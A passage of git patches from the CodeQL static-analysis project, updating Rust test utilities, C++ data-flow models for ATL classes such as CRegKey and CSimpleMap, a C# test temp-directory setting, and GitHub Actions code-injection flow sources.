"Argument[0]", "ReturnValue.Tuple[1]", "value", "manual"] diff --git a/rust/ql/test/library-tests/dataflow/models/models.ql b/rust/ql/test/library-tests/dataflow/models/models.ql index 53c3f5de4be..10d2f9f91b7 100644 --- a/rust/ql/test/library-tests/dataflow/models/models.ql +++ b/rust/ql/test/library-tests/dataflow/models/models.ql @@ -15,66 +15,6 @@ query predicate invalidSpecComponent(SummarizedCallable sc, string s, string c) Private::External::invalidSpecComponent(s, c) } -private class SummarizedCallableIdentity extends SummarizedCallable::Range { - SummarizedCallableIdentity() { this = "repo::test::_::crate::identity" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableCoerce extends SummarizedCallable::Range { - SummarizedCallableCoerce() { this = "repo::test::_::crate::coerce" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue" and - preservesValue = false - } -} - -private class SummarizedCallableGetVarPos extends SummarizedCallable::Range { - SummarizedCallableGetVarPos() { this = "repo::test::_::crate::get_var_pos" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0].Variant[crate::MyPosEnum::A(0)]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableSetVarPos extends SummarizedCallable::Range { - SummarizedCallableSetVarPos() { this = "repo::test::_::crate::set_var_pos" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue.Variant[crate::MyPosEnum::B(0)]" and - preservesValue = true - } -} - -private class SummarizedCallableGetVarField extends SummarizedCallable::Range { - SummarizedCallableGetVarField() { this = "repo::test::_::crate::get_var_field" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0].Variant[crate::MyFieldEnum::C::field_c]" and - output = "ReturnValue" and - preservesValue = true - } -} - -private class SummarizedCallableSetVarField extends SummarizedCallable::Range { - SummarizedCallableSetVarField() { this = "repo::test::_::crate::set_var_field" } - - override predicate propagatesFlow(string input, string output, boolean preservesValue) { - input = "Argument[0]" and - output = "ReturnValue.Variant[crate::MyFieldEnum::D::field_d]" and - preservesValue = true - } -} - module CustomConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { DefaultFlowConfig::isSource(source) } diff --git a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref index 504d27ff30c..7aee10fcc4a 100644 --- a/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref +++ b/rust/ql/test/query-tests/security/CWE-089/SqlInjection.qlref @@ -1,2 +1,4 @@ query: queries/security/CWE-089/SqlInjection.ql -postprocess: utils/InlineExpectationsTestQuery.ql +postprocess: + - utils/PrettyPrintModels.ql + - utils/InlineExpectationsTestQuery.ql diff --git a/rust/ql/test/utils/InlineFlowTest.qll b/rust/ql/test/utils/InlineFlowTest.qll index dcf8ad8c445..cb5b9f72abb 100644 --- a/rust/ql/test/utils/InlineFlowTest.qll +++ b/rust/ql/test/utils/InlineFlowTest.qll @@ -9,6 +9,7 @@ private import codeql.rust.controlflow.CfgNodes private import codeql.rust.dataflow.DataFlow private import codeql.rust.dataflow.internal.DataFlowImpl private import codeql.rust.dataflow.internal.TaintTrackingImpl +private import codeql.rust.dataflow.internal.ModelsAsData as MaD private import internal.InlineExpectationsTestImpl as InlineExpectationsTestImpl // Holds if the target expression of `call` is a path and the string representation of the path is `name`. @@ -38,7 +39,7 @@ private module FlowTestImpl implements InputSig { exists(sink) } - predicate interpretModelForTest(QlBuiltins::ExtensionId madId, string model) { none() } + predicate interpretModelForTest = MaD::interpretModelForTest/2; } import InlineFlowTestMake diff --git a/rust/ql/test/utils/PrettyPrintModels.ql b/rust/ql/test/utils/PrettyPrintModels.ql new file mode 100644 index 00000000000..9740f20433f --- /dev/null +++ b/rust/ql/test/utils/PrettyPrintModels.ql @@ -0,0 +1,7 @@ +/** + * @kind test-postprocess + */ + +import codeql.rust.dataflow.internal.ModelsAsData +import codeql.dataflow.test.ProvenancePathGraph +import codeql.dataflow.test.ProvenancePathGraph::TestPostProcessing::TranslateProvenanceResults diff --git a/rust/ql/test/utils/ProvenancePathGraph.qll b/rust/ql/test/utils/ProvenancePathGraph.qll new file mode 100644 index 00000000000..fd5b771941d --- /dev/null +++ b/rust/ql/test/utils/ProvenancePathGraph.qll @@ -0,0 +1,8 @@ +private import codeql.dataflow.DataFlow as DF +private import codeql.dataflow.test.ProvenancePathGraph as Graph +private import codeql.rust.dataflow.internal.ModelsAsData + +/** Transforms a `PathGraph` by printing the provenance information. */ +module ShowProvenance PathGraph> { + import Graph::ShowProvenance +} From 5624a77176db4fe7d36038d7ce6204970d2c5337 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 9 Dec 2024 13:59:01 +0100 Subject: [PATCH 0923/1267] C#: Use TEST_TEMPDIR when set for test files. --- csharp/extractor/Semmle.Util.Tests/LongPaths.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs index 1c0d5e2ce13..c1583e27503 100644 --- a/csharp/extractor/Semmle.Util.Tests/LongPaths.cs +++ b/csharp/extractor/Semmle.Util.Tests/LongPaths.cs @@ -12,7 +12,7 @@ namespace SemmleTests.Semmle.Util /// public sealed class LongPaths : IDisposable { - private static readonly string tmpDir = Path.GetTempPath(); + private static readonly string tmpDir = Environment.GetEnvironmentVariable("TEST_TMPDIR") ?? Path.GetTempPath(); private static readonly string shortPath = Path.Combine(tmpDir, "test.txt"); private static readonly string longPath = Path.Combine(tmpDir, "aaaaaaaaaaaaaaaaaaaaaaaaaaaa", "bbbbbbbbbbbbbbbbbbbbbbbbbbbbb", "ccccccccccccccccccccccccccccccc", "ddddddddddddddddddddddddddddddddddddd", "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeee", "fffffffffffffffffffffffffffffffff", From d735a1433bc1b8cf363c484923e1ed8983e0afc6 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:23:15 +0000 Subject: [PATCH 0924/1267] C++: Also flow to the return value of 'operator='. --- cpp/ql/lib/ext/CSimpleArray.model.yml | 3 ++- .../dataflow/external-models/flow.expected | 10 +++++----- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/cpp/ql/lib/ext/CSimpleArray.model.yml b/cpp/ql/lib/ext/CSimpleArray.model.yml index 1c6337bf74c..8daae929651 100644 --- a/cpp/ql/lib/ext/CSimpleArray.model.yml +++ b/cpp/ql/lib/ext/CSimpleArray.model.yml @@ -8,4 +8,5 @@ extensions: - ["", "CSimpleArray", True, "GetData", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CSimpleArray", True, "SetAtIndex", "", "", "Argument[*1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CSimpleArray", True, "operator[]", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] \ No newline at end of file + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CSimpleArray", True, "operator=", "", "", "Argument[*0].Element[@]", "ReturnValue[*].Element[@]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 8930cadb8d8..81a9c605f00 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:799 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:797 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:798 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:798 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:799 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | From d3dc318ba1504c4e74874efe5e9d118ea5dd8784 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:26:46 +0000 Subject: [PATCH 0925/1267] C++: Make 'GetValueAt' a value-preserving step. --- cpp/ql/lib/ext/CSimpleMap.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CSimpleMap.model.yml b/cpp/ql/lib/ext/CSimpleMap.model.yml index 323b5be0174..814e814228e 100644 --- a/cpp/ql/lib/ext/CSimpleMap.model.yml +++ b/cpp/ql/lib/ext/CSimpleMap.model.yml @@ -4,7 +4,7 @@ extensions: extensible: summaryModel data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "CSimpleMap", True, "Add", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "taint", "manual"] + - ["", "CSimpleMap", True, "GetValueAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] - ["", "CSimpleMap", True, "Lookup", "", "", "Argument[-1].Element[@]", "ReturnValue.Element[@]", "value", "manual"] - ["", "CSimpleMap", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] - ["", "CSimpleMap", True, "SetAtIndex", "", "", "Argument[*@2]", "Argument[-1].Element[@]", "value", "manual"] From 1fa00f106532e3db0457368d78a9f187ac9d61ee Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 9 Dec 2024 14:31:10 +0100 Subject: [PATCH 0926/1267] Capture the event name rathen than the whole event --- .../codeql/actions/dataflow/FlowSources.qll | 52 ++++++++++--------- .../Security/CWE-094/CodeInjectionCritical.ql | 2 +- 2 files changed, 28 insertions(+), 26 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index cf1763b1c03..9259f18f108 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,22 +19,26 @@ abstract class RemoteFlowSource extends SourceNode { abstract string getSourceType(); /** Gets the event that triggered the source. */ - abstract Event getEvent(); + abstract string getEventName(); override string getThreatModel() { result = "remote" } } +/** + * A data flow source of user input from github context. + * eg: github.head_ref + */ class GitHubCtxSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(event.getName(), context_prefix) and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) @@ -42,23 +46,23 @@ class GitHubCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; - Event event; + string event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getATriggerEvent() and + event = e.getATriggerEvent().getName() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or @@ -74,7 +78,7 @@ class GitHubEventCtxSource extends RemoteFlowSource { string getContext() { result = context } - override Event getEvent() { result = event } + override string getEventName() { result = event } } abstract class CommandSource extends RemoteFlowSource { @@ -82,7 +86,7 @@ abstract class CommandSource extends RemoteFlowSource { abstract Run getEnclosingRun(); - override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } + override string getEventName() { result = this.getEnclosingRun().getATriggerEvent().getName() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -172,19 +176,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; - Event event; + string event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and - event = e.getEnclosingWorkflow().getATriggerEvent() and + event = e.getEnclosingWorkflow().getATriggerEvent().getName() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(event.getName(), context_prefix) and + contextTriggerDataModel(event, context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -199,7 +203,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { override string getSourceType() { result = flag } - override Event getEvent() { result = event } + override string getEventName() { result = event } } /** @@ -212,7 +216,7 @@ class MaDSource extends RemoteFlowSource { override string getSourceType() { result = sourceType } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } abstract class FileSource extends RemoteFlowSource { } @@ -225,20 +229,18 @@ class ArtifactSource extends RemoteFlowSource, FileSource { override string getSourceType() { result = "artifact" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { - Event event; - CheckoutSource() { this.asExpr() instanceof SimplePRHeadCheckoutStep } override string getSourceType() { result = "artifact" } - override Event getEvent() { result = event } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -255,7 +257,7 @@ class DornyPathsFilterSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -278,7 +280,7 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } /** @@ -301,7 +303,7 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { override string getSourceType() { result = "filename" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { @@ -315,7 +317,7 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { @@ -329,7 +331,7 @@ class ZenteredIssueFormBodyParserSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -352,5 +354,5 @@ class OctokitRequestActionSource extends RemoteFlowSource { override string getSourceType() { result = "text" } - override Event getEvent() { result = this.asExpr().getATriggerEvent() } + override string getEventName() { result = this.asExpr().getATriggerEvent().getName() } } diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index b52c0702344..c4ab00837ca 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -23,7 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - source.getNode().(RemoteFlowSource).getEvent() = event and + source.getNode().(RemoteFlowSource).getEventName() = event.getName() and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | From db86f6aaf92b33bed3fb0d8da9535b353cb28ee4 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:32:22 +0000 Subject: [PATCH 0927/1267] C++: Fix annotation. --- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index 9a57fd604a5..0e70a101620 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -785,7 +785,7 @@ void test_CSimpleMap() { { CSimpleMap a; auto pos = a.FindKey("hello"); - sink(a.GetValueAt(pos)); // $ MISSING: ir + sink(a.GetValueAt(pos)); // clean } { CSimpleMap a; From 674dbce36d71d284790d6ecc1864a7887424d835 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:38:37 +0000 Subject: [PATCH 0928/1267] C++: Add taint flow through 'CRegKey::Create'. --- cpp/ql/lib/ext/CRegKey.model.yml | 1 + .../dataflow/external-models/flow.expected | 10 +++++----- 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 45114347ee0..84d85c40a01 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -5,6 +5,7 @@ extensions: data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance - ["", "CRegKey", True, "CRegKey", "(CRegKey &)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CRegKey", True, "CRegKey", "(HKEY)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] + - ["", "CRegKey", True, "Create", "", "", "Argument[*1]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected index 81a9c605f00..137642d522a 100644 --- a/cpp/ql/test/library-tests/dataflow/external-models/flow.expected +++ b/cpp/ql/test/library-tests/dataflow/external-models/flow.expected @@ -11,14 +11,14 @@ edges | asio_streams.cpp:100:44:100:62 | call to buffer | asio_streams.cpp:103:29:103:39 | *send_buffer | provenance | Sink:MaD:6 | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | provenance | | | asio_streams.cpp:100:64:100:71 | *send_str | asio_streams.cpp:100:44:100:62 | call to buffer | provenance | MaD:10 | -| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:800 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:798 | -| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:799 | +| test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | test.cpp:4:5:4:11 | [summary] to write: ReturnValue in ymlStep | provenance | MaD:801 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:7:10:7:18 | call to ymlSource | provenance | Src:MaD:799 | +| test.cpp:7:10:7:18 | call to ymlSource | test.cpp:11:10:11:10 | x | provenance | Sink:MaD:800 | | test.cpp:7:10:7:18 | call to ymlSource | test.cpp:13:18:13:18 | x | provenance | | | test.cpp:13:10:13:16 | call to ymlStep | test.cpp:13:10:13:16 | call to ymlStep | provenance | | -| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:799 | +| test.cpp:13:10:13:16 | call to ymlStep | test.cpp:15:10:15:10 | y | provenance | Sink:MaD:800 | | test.cpp:13:18:13:18 | x | test.cpp:4:5:4:11 | [summary param] 0 in ymlStep | provenance | | -| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:800 | +| test.cpp:13:18:13:18 | x | test.cpp:13:10:13:16 | call to ymlStep | provenance | MaD:801 | nodes | asio_streams.cpp:56:18:56:23 | [summary param] *0 in buffer | semmle.label | [summary param] *0 in buffer | | asio_streams.cpp:56:18:56:23 | [summary] to write: ReturnValue in buffer | semmle.label | [summary] to write: ReturnValue in buffer | From 7f87a25768dbd14718079766f91d04b45560abb8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:41:14 +0000 Subject: [PATCH 0929/1267] C++: Fix 'QueryMultiStringValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 84d85c40a01..a68a360afc0 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -9,7 +9,7 @@ extensions: - ["", "CRegKey", True, "Attach", "", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CRegKey", True, "QueryBinaryValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] From 184dfc24b9e199859db493dbd58c59f307d4ac1c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 13:42:39 +0000 Subject: [PATCH 0930/1267] C++: Fix 'QueryStringValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index a68a360afc0..fd13291591d 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -11,7 +11,7 @@ extensions: - ["", "CRegKey", True, "QueryDWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryMultiStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryQWORDValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[**1]", "taint", "manual"] + - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] From 5f33733b6e87f06d155bda4114d8174b0b038c1c Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 14:27:24 +0000 Subject: [PATCH 0931/1267] C++: Fix 'QueryValue' model. --- cpp/ql/lib/ext/CRegKey.model.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index fd13291591d..6b3da2adfb7 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -14,7 +14,7 @@ extensions: - ["", "CRegKey", True, "QueryStringValue", "", "", "Argument[*0]", "Argument[*1]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[**0]", "taint", "manual"] + - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file From 8bdd10c0c23ccb3419002fa19f295be465feb4a8 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Mon, 9 Dec 2024 14:31:17 +0000 Subject: [PATCH 0932/1267] C++: Fix spurious columns in 'CRegKey'. --- cpp/ql/lib/ext/CRegKey.model.yml | 6 +++--- .../dataflow/external-models/validatemodels.expected | 3 +-- 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/cpp/ql/lib/ext/CRegKey.model.yml b/cpp/ql/lib/ext/CRegKey.model.yml index 6b3da2adfb7..1cf2a7d6773 100644 --- a/cpp/ql/lib/ext/CRegKey.model.yml +++ b/cpp/ql/lib/ext/CRegKey.model.yml @@ -15,6 +15,6 @@ extensions: - ["", "CRegKey", True, "QueryValue", "(LPCTSTR,DWORD *,void *,ULONG *)", "", "Argument[*0]", "Argument[*2]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(DWORD &,LPCTSTR)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - ["", "CRegKey", True, "QueryValue", "(LPTSTR,LPCTSTR,DWORD *)", "", "Argument[*1]", "Argument[*0]", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator HKEY", "", "Argument[-1]", "ReturnValue", "taint", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] - - ["", "CRegKey", True, "QueryValue", "operator=", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file + - ["", "CRegKey", True, "operator HKEY", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "ReturnValue[*]", "value", "manual"] + - ["", "CRegKey", True, "operator=", "", "", "Argument[*0]", "Argument[-1]", "value", "manual"] \ No newline at end of file diff --git a/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected b/cpp/ql/test/library-tests/dataflow/external-models/validatemodels.expected index 423e238ecd7..b2c54e67c2f 100644 --- 